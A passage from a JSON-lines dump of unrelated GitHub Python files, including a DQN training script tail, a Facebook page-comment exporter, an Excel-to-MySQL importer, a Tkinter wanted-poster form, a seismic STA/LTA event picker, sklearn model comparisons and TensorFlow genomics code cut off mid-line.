dqn.load_state_dicts()\r\n\r\n if args.train:\r\n e = CustomGymEnvironment(env=env,\r\n algorithm=dqn,\r\n seed=args.seed,\r\n logger=logger,\r\n gifs_recorder=None)\r\n e.train(num_episodes=args.num_episodes, max_t=None, add_noise=True,\r\n scores_window_size=100, save_every=1)\r\n\r\n if args.test:\r\n print('\\ntest\\n')\r\n e_test = CustomGymEnvironment(env=test_env,\r\n algorithm=dqn,\r\n seed=args.seed,\r\n logger=logger,\r\n gifs_recorder=None)\r\n e_test.test(num_episodes=1, load_state_dicts=True, render=True)\r\n","repo_name":"Tanveer81/Inventory_Optimization_RL","sub_path":"dqn_date.py","file_name":"dqn_date.py","file_ext":"py","file_size_in_byte":11321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43966380608","text":"\"\"\" Extract all Comments from posts/feed from FB Page \"\"\"\r\n\"\"\"\r\n\tFile description:\r\n\tExtract Comments related to Page posts from FB and exports them to CSV file\r\n\t\r\n\tCreated by: Iviglious\r\n\tCreated date: 03 Aug 2017\r\n\t\r\n\tDescription of the input:\r\n\tXML_CONFIG_FILE - path and name of the XML file.\r\n\tIt's controlled by a XML config file, which contains the user data:\r\n\t - User ID\r\n\t - Access Token\r\n\t - FB Graph URLs\r\n\t - etc.\r\n\tCSV_EXPORT_FILE - path and name of the CSV file.\r\n\"\"\"\r\n\r\nimport time\r\nimport requests as REQ\r\nimport json\r\nimport csv\r\nimport re\r\nfrom datetime import date, timedelta\r\nfrom xml.dom import minidom\r\n\r\n############################################################\r\n## Define Functions and Constants\r\n############################################################\r\n\r\nXML_CONFIG_FILE = r'fb_api_config.xml'\r\nCSV_EXPORT_FILE = r'fb_page_comments.csv'\r\n\r\ndef XmlGetValue(xmldoc, tag_name):\r\n \"\"\" Function to retrieve the value of XML node \"\"\"\r\n return str(xmldoc.getElementsByTagName(tag_name)[0].childNodes[0].nodeValue)\r\n\r\n\r\n############################################################\r\n## Script Body\r\n############################################################\r\n\r\n# Start\r\nprint(\"Started...\")\r\n\r\n# Get API configuration from XML\r\nxmldoc = minidom.parse(XML_CONFIG_FILE)\r\n# feed_id\r\napi_url_feed_id = XmlGetValue(xmldoc, 'root_url')\r\napi_url_feed_id += '/' + XmlGetValue(xmldoc, 'page_id')\r\napi_url_feed_id += '/' + XmlGetValue(xmldoc, 'page_feedid_url')\r\napi_url_feed_id += '&access_token=' + XmlGetValue(xmldoc, 'page_access_token')\r\n#print(api_url_feed_id)\r\napi_mdata_feed_id = XmlGetValue(xmldoc, 'page_feed_mdata')\r\n#print(api_mdata_feed_id)\r\n\r\n# comments\r\napi_url_comm = XmlGetValue(xmldoc, 'root_url')\r\napi_url_comm += '/' + XmlGetValue(xmldoc, 'page_comments_url')\r\napi_url_comm += '&access_token=' + XmlGetValue(xmldoc, 'page_access_token')\r\n#print(api_url_comm)\r\napi_mdata_comm = XmlGetValue(xmldoc, 'page_comments_mdata')\r\n#print(api_mdata_comm)\r\n\r\n\r\n# Prepare CSV\r\ncsvfile = open(CSV_EXPORT_FILE, 'w', encoding='utf-8')\r\ncsvwriter = csv.DictWriter( csvfile\r\n , fieldnames=['id','post_id','created_time','from_id','from_name','message','image_url']\r\n , dialect = 'excel'\r\n , delimiter = ','\r\n , lineterminator='\\r')\r\ncsvwriter.writeheader()\r\n\r\n# Prepare regexp: remove new line symbols\r\nrx = '[' + re.escape(''.join(['\\r','\\r\\n'])) + ']'\r\n\r\n# Call the Feed API\r\ntotal_rows = 0\r\napi_res = REQ.get(api_url_feed_id, data=api_mdata_comm)\r\nif (api_res.ok):\r\n jRes = api_res.json()['data']\r\n #print(\"Number of rows (feed): {0}\".format(len(jRes)))\r\n\r\n # Feed Loop\r\n for jRow in jRes:\r\n # Get post_id\r\n feed_id = jRow['id']\r\n\r\n # Prepare the Comments API\r\n api_url_comm_current = api_url_comm.replace('{feed_id}', feed_id)\r\n\r\n # Call the Comments API\r\n num_rows = 0\r\n api_res = REQ.get(api_url_comm_current, data=api_mdata_comm)\r\n if (api_res.ok):\r\n jRes = api_res.json()\r\n # Check if there are comments in current post\r\n if ('comments' not in jRes): continue\r\n \r\n num_rows = len(jRes['comments']['data'])\r\n #print(\"Number of rows (comments): {0}\".format(num_rows))\r\n\r\n feed_id = jRes['id']\r\n # Comments Loop\r\n for jRow in jRes['comments']['data']:\r\n # Prepare the text fields\r\n message_str = ''\r\n if ('message' in jRow): message_str = re.sub(rx, ' ', jRow['message'])\r\n image_url_str = ''\r\n if ('attachment' in jRow\r\n and 'media' in jRow['attachment']\r\n and 'image' in jRow['attachment']['media']\r\n and 'src' in jRow['attachment']['media']['image']):\r\n image_url_str = re.sub(rx, ' ', jRow['attachment']['media']['image']['src'])\r\n\r\n # Export to CSV\r\n csvwriter.writerow(\r\n {\r\n 'id' :jRow['id']\r\n ,'post_id' :feed_id\r\n ,'created_time' :jRow['created_time'][0:19].replace(\"T\", \" \")\r\n ,'from_id' :jRow['from']['id']\r\n ,'from_name' :jRow['from']['name']\r\n ,'message' :message_str\r\n ,'image_url' :image_url_str\r\n })\r\n \r\n else:\r\n api_res.raise_for_status()\r\n total_rows += num_rows\r\n\r\nelse:\r\n api_res.raise_for_status()\r\n\r\n# Close CSV file\r\ncsvfile.close()\r\n\r\n# Finished\r\nprint(\"Finished. {0} row(s) extracted.\".format(total_rows))\r\n","repo_name":"Iviglious/facebook_scrape","sub_path":"fb_extract_page_comments.py","file_name":"fb_extract_page_comments.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21241637353","text":"import torch\n\nfrom . import DropletTransform\n\n\nclass DropletBiasRemoval(DropletTransform):\n\n def __init__(self, min_intensity: float = 0, max_intensity: float = 1,\n min_quantile: float = 0.05, max_quantile: float = 0.98) -> None:\n \"\"\"\n Instead of Bias Field Removal on the whole image we deal with it on the Droplet Level.\n This is intuitively justified by the fact, that the bias field is roughly constant on one single droplet (due to their\n small size). Furthermore it is quite rare that a subplot line intersects with single droplets.\n \"\"\"\n super().__init__()\n self.min_intensity = min_intensity\n self.max_intensity = max_intensity\n self.min_quantile = min_quantile\n self.max_quantile = max_quantile\n\n def transform(self, drop: torch.FloatTensor) -> torch.FloatTensor:\n \"\"\"\n Min - Max Normalization to approximate constant multiplicative factor.\n \"\"\"\n\n # Get quantiles\n l_intensity = torch.quantile(drop, self.min_quantile)\n u_intensity = torch.quantile(drop, self.max_quantile)\n\n # Moves the min_quantile to 0\n drop -= l_intensity\n\n # Truncates below l_intensity\n drop[drop < 0] = 0\n \n # Truckate above moved version of u_intensity\n m = u_intensity - l_intensity\n drop[drop > m] = m\n\n # Rescale and translate\n new_m = self.max_intensity - self.min_intensity\n drop = drop / m * new_m + self.min_intensity\n\n return drop\n","repo_name":"JohanLokna/TumoroidClassification","sub_path":"pipeline/transform/droplet_biasremoval.py","file_name":"droplet_biasremoval.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34129260572","text":"# 在Excel最后一列加上日期、删除前两行、导入数据库\n\nimport os\nimport xlrd\nimport xlutils.copy\nimport re\nimport win32com.client # 这里用到win32com.client,需要安装pywin32模块\nimport pymysql\nimport pandas as pd\nimport sys\nfrom sqlalchemy import create_engine\n\n\n# 文件路径\npath = 'E:\\\\旧每日数据\\\\12月数据\\\\20171115/'\n\n\n# 添加日期、商品编码函数\ndef add_date():\n for f in os.listdir(path): # 要处理的excel文件路径\n # print(\"file:\", f )\n try:\n print(\"file:\", f)\n name = re.match('.*.xls', str(f)).group()\n # print(name)\n rb = xlrd.open_workbook(path+name) # 打开excel\n sheet = rb.sheet_by_index(0) # 获得sheet\n # date = sheet.cell(1,0).value[5:13] # 获取第二行第一列的内容\n date = path[-9:-1]\n # code = name[12:20]\n # code = name[8:16]\n code = re.search(\"[0-9]{8}\", name).group()\n print(code)\n print(date)\n wb = xlutils.copy.copy(rb)\n ws = wb.get_sheet(0)\n # print(sheet.nrows)\n ws.write(2, 13, '商品编码')\n ws.write(2, 14, '日期') # 在第三行14列写入日期\n\n for rows in range(3, sheet.nrows):\n ws.write(rows, 14, date) # 在第三行到最后一行14列写入获取的时间\n for rows in range(3, sheet.nrows):\n ws.write(rows, 13, code) # 在第三行到最后一行13列写入获取的编码\n wb.save(path + f)\n except AttributeError:\n print(\"file:\")\n\n\ndef del_row():\n xlApp = win32com.client.Dispatch('Excel.Application') # 打开EXCEL\n for f in os.listdir(path):\n try:\n name = re.match('.*.xls', str(f)).group()\n print(\"file:\", name)\n xlBook = xlApp.Workbooks.Open(path + name)\n xlSht = xlBook.Worksheets('客户日订货情况表') # 要处理的excel页,默认第一页是‘sheet1’\n for i in range(1, 2):\n xlSht.Rows(i).Delete()\n xlBook.Close(SaveChanges=1) # 完成 关闭保存文件\n except AttributeError:\n continue\n del xlApp\n\n\ndef to_mysql():\n\n for f in os.listdir(path):\n # print(\"file:\", f)\n try:\n name = re.match('.*.xls', str(f)).group()\n df = pd.read_excel(path + name)\n print(name)\n # df = df.ix[1:, [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]] # 行,列\n df = df.ix[1:, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]]\n print(df.head())\n yconnect = create_engine('mysql+pymysql://root:root@192.168.31.130:3306/pos?charset=utf8')\n pd.io.sql.to_sql(df, 'dec', yconnect, if_exists='append',index=None)\n except AttributeError:\n print(\"file:\")\n\n\nadd_date()\ndel_row()\ndel_row()\nto_mysql()","repo_name":"Narcissus7/tools","sub_path":"add_date.py","file_name":"add_date.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30504038955","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom no_ui_main import *\nimport datetime\nimport json\n\ntoday = datetime.date.today()\ncurrent_year = today.year + 1\n\n\n# defining\n# controls rd entry, makes it so you can't input text and write more than 4 digits\ndef validate_rd(P):\n if len(P) == 0:\n return True\n elif len(P) < 5 and P.isdigit():\n return True\n else:\n return False\n\n\ndef validate_age(P):\n if len(P) == 0:\n return True\n elif len(P) < 3 and P.isdigit():\n return True\n else:\n return False\n\n\n# controls date entry, makes it so you can't write a wrong date\ndef validate_dt(P):\n if not P == \"DD/MM/YYYY\":\n if len(P) == 0:\n return True\n elif len(P) < 3:\n try:\n if int(P[0:2]) < 32:\n return True\n else:\n return False\n except:\n return False\n elif len(P) > 2 and len(P) < 6 and P[2] == \"/\":\n try:\n if len(P) > 3:\n if int(P[3:5]) < 13:\n return True\n else:\n return False\n else:\n return True\n except:\n return False\n elif len(P) > 5 and len(P) < 11 and P[2] == \"/\" and P[5] == \"/\":\n if len(P) == 10:\n try:\n if int(P[6:11]) < current_year and int(P[6:11]) > 1999:\n return True\n else:\n return False\n except:\n return False\n else:\n return True\n else:\n return False\n else:\n return True\n\n\n# controls time entry, makes it so you can't write an invalid time\ndef validate_tm(P):\n if not P == \"HH:MM\":\n if len(P) == 0:\n return True\n elif len(P) < 3:\n try:\n if int(P[0:2]) < 24:\n return True\n else:\n return False\n except:\n return False\n elif len(P) > 2 and len(P) < 6 and P[2] == \":\":\n if len(P) == 5:\n try:\n if int(P[3:5]) < 60:\n return True\n else:\n return False\n except:\n return False\n else:\n return True\n else:\n return False\n else:\n return True\n\n\n# --- MAIN --- #\ndef main():\n # inner functions\n # removes temp text in the time entry\n def c_temp_time(e):\n if time_entry.get() == \"HH:MM\":\n time_entry.delete(0, END)\n\n # adds temp text in the time entry\n def a_temp_time(e):\n print(len(time_entry.get()))\n if time_entry.get() == \"\":\n time_entry.insert(0, \"HH:MM\")\n elif len(time_entry.get()) < 5:\n time_entry.delete(0, END)\n time_entry.insert(0, \"HH:MM\")\n\n # removes temp text in the date entry\n def c_temp_date(e):\n if date_entry.get() == \"DD/MM/YYYY\":\n date_entry.delete(0, END)\n\n # adds temp text in the date entry\n def a_temp_date(e):\n print(len(date_entry.get()))\n if date_entry.get() == \"\":\n date_entry.insert(0, \"DD/MM/YYYY\")\n elif len(date_entry.get()) < 10:\n date_entry.delete(0, END)\n date_entry.insert(0, \"DD/MM/YYYY\")\n\n # takes all the stuff from the entries/comboboxes and generates the template\n def submit():\n to_fill_in[\"DIVISION\"] = selected_div.get()\n to_fill_in[\"DR\"] = dr\n to_fill_in[\"FULL_NAME\"] = fn_entry.get()\n to_fill_in[\"SEX\"] = selected_sex.get()\n to_fill_in[\"AGE\"] = age_entry.get()\n to_fill_in[\"LOCATION\"] = lc_entry.get()\n to_fill_in[\"RD\"] = rd_entry.get()\n to_fill_in[\"ETHNICITY\"] = eth_entry.get()\n to_fill_in[\"HAIR\"] = hair_entry.get()\n to_fill_in[\"TIME\"] = time_entry.get()\n to_fill_in[\"DATE\"] = date_entry.get()\n to_fill_in[\"OFFENSE\"] = of_entry.get().upper()\n to_fill_in[\"WEAPONS\"] = wp_entry.get()\n to_fill_in[\"DESCRIPTION\"] = dsc_text.get(\"1.0\", END)\n to_fill_in[\"DIVISION_CAPS\"] = to_fill_in[\"DIVISION\"].upper()\n # print(json.dumps(to_fill_in, sort_keys=True, indent=4))\n passed = False\n for k in to_fill_in:\n if to_fill_in[k] == \"\" or to_fill_in[k] == \"\\n\" or to_fill_in[k] == \"null\" or to_fill_in[k] == \"HH:MM\" or to_fill_in[k] == \"DD/MM/YYYY\":\n messagebox.showerror(\"Incorrect input\", f\"Please fill in the {k} field.\")\n passed = False\n break\n else:\n passed = True\n if passed:\n full_name = to_fill_in[\"FULL_NAME\"]\n full_name_mugshot = full_name.lower().replace(\" \", \"_\")\n mugshot = save_file()\n if not mugshot:\n messagebox.showwarning(\"No mugshot\", f\"Mugshot {full_name_mugshot}.png/jpg/jpeg was not found in mugshot/.\")\n messagebox.showinfo(\"Complete\", f\"Wanted poster for {full_name} is complete.\")\n \n\n # root\n root = Tk()\n root.title(\"WANTED!\")\n root.resizable(False, False)\n root.minsize(250, 450)\n\n # icon\n icon = PhotoImage(file=\"icon.png\")\n root.iconphoto(True, icon)\n\n # frame\n main_frame = Frame(root)\n\n # --- ROW 0 -- #\n r0_frame = Frame(main_frame)\n # division (label + combobox)\n selected_div = StringVar()\n divisions = [\n \"Central\",\n \"South\",\n \"Valley\",\n \"West\",\n ]\n div_label = Label(r0_frame, text=\"Division:\", pady=7)\n div_label.grid(row=0, column=0, padx=(0, 7))\n div_dropdown = ttk.Combobox(\n r0_frame, values=divisions, width=7, textvariable=selected_div\n )\n div_dropdown[\"state\"] = \"readonly\"\n div_dropdown.grid(row=0, column=1, pady=7)\n\n # rd (label + stringvar)\n temp_frame = Frame(r0_frame, width=20).grid(row=0, column=2)\n dr = create_dr()\n dr_label = Label(r0_frame, text=f\"DR: {dr}\")\n dr_label.grid(row=0, column=3)\n # --- ROW 0 END --- #\n r0_frame.grid(row=0, column=0)\n\n # --- ROW 1 -- #\n r1_frame = Frame(main_frame)\n # full name (label + entry)\n fn_label = Label(r1_frame, text=\"Full name: \")\n fn_label.grid(row=0, column=0)\n fn_entry = Entry(r1_frame)\n fn_entry.config(width=27)\n fn_entry.grid(row=0, column=1)\n # --- ROW 1 END --- #\n r1_frame.grid(row=1, column=0)\n\n # --- ROW 2 --- #\n r2_frame = Frame(main_frame)\n # sex (label + combobox)\n sex_label = Label(r2_frame, text=\"Sex: \", padx=7).grid(row=0, column=0)\n sexes = [\n \"Male\",\n \"Female\",\n \"Unknown\",\n ]\n selected_sex = StringVar()\n sex_dropdown = ttk.Combobox(\n r2_frame, values=sexes, textvariable=selected_sex, width=9\n ).grid(row=0, column=1, pady=7)\n\n # age (label + entry)\n temp_frame2 = Frame(r2_frame, width=50).grid(row=0, column=2)\n age_label = Label(r2_frame, text=\"Age:\").grid(row=0, column=3, padx=(5, 0))\n vcmd_age = (root.register(validate_age), \"%P\")\n age_entry = Entry(r2_frame, width=4, validate=\"key\", validatecommand=vcmd_age)\n age_entry.grid(row=0, column=4, padx=7)\n # --- ROW 2 END --- #\n r2_frame.grid(row=2, column=0)\n\n # --- ROW 3 --- #\n r3_frame = Frame(main_frame)\n # location (label + entry)\n lc_label = Label(r3_frame, text=\"Location: \").grid(row=0, column=0)\n lc_entry = Entry(r3_frame, width=18)\n lc_entry.grid(row=0, column=1)\n\n # rd (label + entry)\n rd_label = Label(r3_frame, text=\"RD#: \").grid(row=0, column=2)\n vcmd_rd = (root.register(validate_rd), \"%P\")\n rd_entry = Entry(r3_frame, width=4, validate=\"key\", validatecommand=vcmd_rd)\n rd_entry.grid(row=0, column=3)\n # --- ROW 3 END --- #\n r3_frame.grid(row=3, column=0)\n\n # --- ROW 4 --- #\n r4_frame = Frame(main_frame)\n # ethnicity (label + entry)\n eth_label = Label(r4_frame, text=\"Ethnicity: \").grid(row=0, column=0)\n eth_entry = Entry(r4_frame, width=11)\n eth_entry.grid(row=0, column=1)\n\n # hair (label + entry)\n hair_label = Label(r4_frame, text=\"Hair: \").grid(row=0, column=2)\n hair_entry = Entry(r4_frame, width=11)\n hair_entry.grid(row=0, column=3, pady=7)\n # --- ROW 4 END --- #\n r4_frame.grid(row=4, column=0)\n\n # --- ROW 5 --- #\n r5_frame = Frame(main_frame)\n temp_frame3 = Frame(r5_frame, width=30).grid(row=0, column=2)\n # time (label + entry)\n time_label = Label(r5_frame, text=\"Time: \").grid(row=0, column=0)\n vcmd_tm = (root.register(validate_tm), \"%P\")\n time_entry = Entry(r5_frame, width=7, validate=\"key\", validatecommand=vcmd_tm)\n time_entry.insert(0, \"HH:MM\")\n time_entry.bind(\"\", c_temp_time)\n time_entry.bind(\"\", a_temp_time)\n time_entry.grid(row=0, column=1)\n # date (label + entry)\n date_label = Label(r5_frame, text=\"Date: \").grid(row=0, column=3)\n vcmd_dt = (root.register(validate_dt), \"%P\")\n date_entry = Entry(r5_frame, width=13, validate=\"key\", validatecommand=vcmd_dt)\n date_entry.insert(0, \"DD/MM/YYYY\")\n date_entry.bind(\"\", c_temp_date)\n date_entry.bind(\"\", a_temp_date)\n date_entry.grid(row=0, column=4)\n # --- ROW 5 END --- #\n r5_frame.grid(row=5, column=0)\n\n # --- ROW 6 --- #\n r6_frame = Frame(main_frame)\n # offense (label + entry)\n of_label = Label(r6_frame, text=\"Offense: \").grid(row=0, column=0)\n of_entry = Entry(r6_frame, width=29)\n of_entry.grid(row=0, column=1, pady=(7,0))\n # --- ROW 6 END --- #\n r6_frame.grid(row=6, column=0)\n\n # --- ROW 7 --- #\n r7_frame = Frame(main_frame)\n # weapons (label + entry)\n wp_label = Label(r7_frame, text=\"Weapon(s): \").grid(row=0, column=0, pady=(0,7))\n wp_entry = Entry(r7_frame, width=26)\n wp_entry.grid(row=0, column=1)\n # --- ROW 7 END --- #\n r7_frame.grid(row=7, column=0)\n\n # --- ROW 8 --- #\n r8_frame = Frame(main_frame)\n # description (label + text + button)\n dsc_label = Label(r8_frame, text=\"Description: \").pack(side=TOP, anchor=NW)\n dsc_text = Text(r8_frame, width=38, height=12, wrap=WORD)\n dsc_text.config(font=\"Calibri 9\")\n dsc_text.pack(side=TOP)\n dsc_button = Button(r8_frame, text=\"Generate!\", command=submit).pack(\n side=TOP, pady=7\n )\n # --- ROW 8 END --- #\n r8_frame.grid(row=8, column=0)\n\n # frame end\n main_frame.grid(row=0, column=0)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# ---------------------------------------------- #\n# Division: (dropdown) DR: (checkbox if random, if not - entry)\n# Full name: | (entry) |#\n# Sex: (dropdown) Age: |(entry)| #\n# Location: |(entry) | RD: |(entry)|#\n# Ethnicity: |(entry) | Hair: |(entry) |#\n# Time: |(entry)| Date: |(entry) |#\n# Offense: |(entry) |#\n# Weapons: |(entry) |#\n# Description: #\n# |(entry) |#\n# | |#\n# | |#\n# | |#\n# | |#\n# | |#\n# ---------------------------------------------- #\n# (button submit) #\n# ---------------------------------------------- #\n","repo_name":"vad1m4/fill_wanted_suspect","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16242352912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 13 11:17:23 2014\r\nTHIS PROGRAM USES THE STALTA PROGRAM TO SEARCHE THROUGH DOWNLOADED\r\nSEISMIC DATA AND WRITE TRIGGER TIMES TO A TEXT FILE\r\n@author: plin976\r\n\"\"\"\r\nfrom obspy import UTCDateTime\r\nfrom obspy import Stream\r\nfrom obspy import Trace\r\nimport obspy.signal\r\nfrom petfun import*\r\n\r\n#CHANGABLE SETTINGS\r\nstartUTC=UTCDateTime(2014,2,14,4,17,45) #CHECK\r\n#startUTC=UTCDateTime(2014,1,31,1,15,49) #CHECK\r\n#startUTC=UTCDateTime(2014,1,1,16,0,0) #very long Dur teleseismic\r\n#startUTC=UTCDateTime(2014,8,27,10,25,0) #MedDur/LowFreq\r\n#startUTC=UTCDateTime(2014,8,6,4,10,0) #LongDur/LowFreq\r\n#startUTC=UTCDateTime(2014,1,2,1,0,0) #Two ShortDur, closely spaced quakes\r\nplot='n' #y/n\r\ndownloadhours=1 #Normal is 1\r\ncycles=24*60\r\n\r\nS=1.5 #Tsta, long-->fewer picks at beginning of .sac file\r\nL=150 #Tlta, default 150, must be long to pick up fluid quakes\r\nshortdurfile='Pick_Short_2014-1' #short duration trigger file\r\nlongdurfile='Pick_Long_2014-1' #long duration trigger file\r\nT='5' #Trigger ratio\r\nD='1.5' #Detrigger ratio\r\nF='300' #Trigdsensetime, 50 default, doesn't seem to matter much\r\nP='40' #Trigduration, must >=50 so that one LongDur quake does not show up as multiple picks\r\nCutoff=60 #Cutoff for short/long duration, must be >P\r\nstation='WIZ'\r\nchannel='Z'\r\n\r\ndef FindTriggers(stream3,startUTC,S,L,T,D,F,P): #Input: str, startUTC,trigger/detrigger threshholdd Output: triggertimes in year:month:day:your:minute:second format\r\n triggertimesYMD=[]\r\n triggerdurationsfloat=[]\r\n stream3.write('stalta.sac',format='SAC') #Writes sac file\r\n if plot=='y':\r\n main([\"programstalta.py\",\"-S\",str(S),\"-L\",str(L),\"-T\",T,\"-D\",D,\"-F\",F,\"-P\",P,\"-p\",\"-w\",\"peterlog\",'stalta.sac']) ##run stalta program which writes logfile\r\n else:\r\n main([\"programstalta.py\",\"-S\",str(S),\"-L\",str(L),\"-T\",T,\"-D\",D,\"-F\",F,\"-P\",P,\"-w\",\"peterlog\",'stalta.sac']) ##run stalta program which writes logfile\r\n subprocess.call('rm stalta.sac', shell=True)\r\n triggertimes,triggerdurations=ReadTriggerLog('peterlog')\r\n\r\n print(\"LISTS\",triggertimes,triggerdurations)\r\n\r\n if triggertimes!=[]:\r\n for i in range(0,len(triggertimes)):\r\n year=str(startUTC.year)\r\n month=str(startUTC.month)\r\n day=str(startUTC.day)\r\n if len(month)==1:\r\n month='0'+month\r\n if len(day)==1:\r\n day='0'+day\r\n triggertimesYMD.append(year+'-'+month+'-'+day+'T'+triggertimes[i])\r\n triggerdurationsfloat.append(float(triggerdurations[i]))\r\n return triggertimesYMD,triggerdurationsfloat\r\n\r\ndef ReadTriggerLog(filename): #Input: filename of stalta program log file; Output: list of triggertimes (H:M:S)\r\n ref=open(filename,'r')\r\n linesskipped=13\r\n for i in range(0,linesskipped):\r\n ref.readline()\r\n entries=ref.read().split()\r\n ref.close()\r\n eventnum=(len(entries)-25)/16\r\n triggertimes=[]\r\n triggerdurations=[]\r\n for i in range(0,eventnum):\r\n triggertimes.append(entries[5+16*i])\r\n triggerdurations.append(entries[10+16*i])\r\n return triggertimes,triggerdurations\r\n \r\n\r\nj=0\r\nfor i in range(0,cycles):\r\n logtimes=[]\r\n sampleUTC=startUTC+j*60**2*downloadhours\r\n try: stream=GetProcessStreamJava(station,channel,sampleUTC-L,downloadhours*60**2+L) #StaLta doesn't start until t>L\r\n except:\r\n print('Could not load data!')\r\n if stream!=0:\r\n stream.detrend()\r\n logtimes,durations=FindTriggers(stream,sampleUTC,S,L,T,D,F,P)\r\n print(logtimes,durations)\r\n for i in range(0,len(logtimes)):\r\n if durations[i]<=Cutoff:\r\n WriteTriggers([logtimes[i]],shortdurfile)\r\n else:\r\n WriteTriggers([logtimes[i]],longdurfile)\r\n j+=1\r\n","repo_name":"petercl83/QuakeSearch","sub_path":"pick_stalta.py","file_name":"pick_stalta.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19050877142","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.datasets import load_iris, load_breast_cancer, load_wine\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport warnings\nwarnings.filterwarnings(action = 'ignore')\nfrom sklearn.metrics import accuracy_score, r2_score\n\n#1. 데이터\ndata_list = [load_iris(return_X_y= True), load_breast_cancer(return_X_y= True), \n load_wine(return_X_y= True),]\n\nmodel_list = [LinearSVC(), LogisticRegression(),\n DecisionTreeClassifier(), RandomForestClassifier(),]\n\ndata_name_list = ['아이리스 : ',\n '브레스트 캔서 : ',\n '와인 : ',]\n\nmodel_name_list = ['LinearSVC : ',\n 'LogisticRegression : ',\n 'DecisionTreeClassifier :',\n 'RF : ',]\n\n#2. 모델\nfor i, value in enumerate(data_list):\n x, y = value \n # print(x.shape, y.shape)\n print(\"=====================\") \n print(data_name_list[i])\n \n for j, value2 in enumerate(model_list):\n model= value2\n #3. 컴파일, 훈련\n model.fit(x, y)\n #4. 평가, 예측\n results = model.score(x, y) \n print(model_name_list[j], \"model.score : \", results)\n y_predict = model.predict(x)\n acc = accuracy_score(y, y_predict)\n print(model_name_list[j], \"accuracy_score : \", acc)\n\n\n# =====================\n# 아이리스 : \n# LinearSVC : model.score : 0.9666666666666667 \n# LinearSVC : accuracy_score : 0.9666666666666667\n# LogisticRegression : model.score : 0.9733333333333334 \n# LogisticRegression : accuracy_score : 0.9733333333333334\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0 \n# RF : accuracy_score : 1.0\n# =====================\n# 브레스트 캔서 :\n# LinearSVC : model.score : 0.9244288224956063\n# LinearSVC : accuracy_score : 0.9244288224956063\n# LogisticRegression : model.score : 0.9472759226713533\n# LogisticRegression : accuracy_score : 0.9472759226713533\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0\n# RF : accuracy_score : 1.0\n# =====================\n# 와인 :\n# LinearSVC : model.score : 0.9325842696629213\n# LinearSVC : accuracy_score : 0.9325842696629213\n# LogisticRegression : model.score : 0.9662921348314607\n# LogisticRegression : accuracy_score : 0.9662921348314607\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0\n# RF : accuracy_score : 1.0","repo_name":"seohee1205/study_aca","sub_path":"ml/ml01~10/m02_for_2_sample.py","file_name":"m02_for_2_sample.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41224391041","text":"t=int(input())\n\nfor i in range(t):\n s=input()\n z=s.split('0')\n x=[]\n for i in z:\n if i!='':\n x+=i,\n \n score=0\n lens=sorted(x,key=lambda i:len(i),reverse=True)\n for i in lens[0::2]:\n score+=len(i)\n print(score)","repo_name":"NvsYashwanth/Codeforces","sub_path":"CodeForces python/Substring Removal Game.py","file_name":"Substring Removal Game.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5036870140","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\n\ntrain_seq, train_label = tfds.as_numpy(tfds.load('genomics_ood', split='train[:10%]', batch_size=-1, as_supervised=True))\ntest_seq, test_label = tfds.as_numpy(tfds.load('genomics_ood', split='test[:1%]', batch_size=-1, as_supervised=True))\n\ndef onehotify(tensor):\n vocab = {'A':'1', 'C': '2', 'G':'3', 'T':'0'}\n for key in vocab.keys():\n tensor = tf.strings.regex_replace(tensor, key, vocab[key])\n split = tf.strings.bytes_split(tensor)\n labels = tf.cast(tf.strings.to_number(split), tf.uint8)\n onehot = tf.one_hot(labels, 4)\n onehot = tf.reshape(onehot, (-1,))\n return onehot\n\ntrain_seq = tf.data.Dataset.from_tensor_slices(train_seq)\ntrain_seq = train_seq.map(onehotify)\n\ntrain_label = tf.data.Dataset.from_tensor_slices(train_label)\ntrain_label = train_label.map(lambda t: tf.one_hot(t, 10))\n\ntrain_ds = tf.data.Dataset.zip((train_seq, train_label))\ntrain_ds = train_ds.batch(128)\ntrain_ds = train_ds.shuffle(buffer_size=128)\n\ntest_seq = tf.data.Dataset.from_tensor_slices(test_seq)\ntest_seq = test_seq.map(onehotify)\n\ntest_label = tf.data.Dataset.from_tensor_slices(test_label)\ntest_label = test_label.map(lambda t: tf.one_hot(t, 10))\n\ntest_ds = tf.data.Dataset.zip((test_seq, test_label))\ntest_ds = test_ds.batch(128)\ntest_ds = test_ds.shuffle(buffer_size=128)\n\n# Custom Model\nclass MyModel(tf.keras.Model):\n\n def 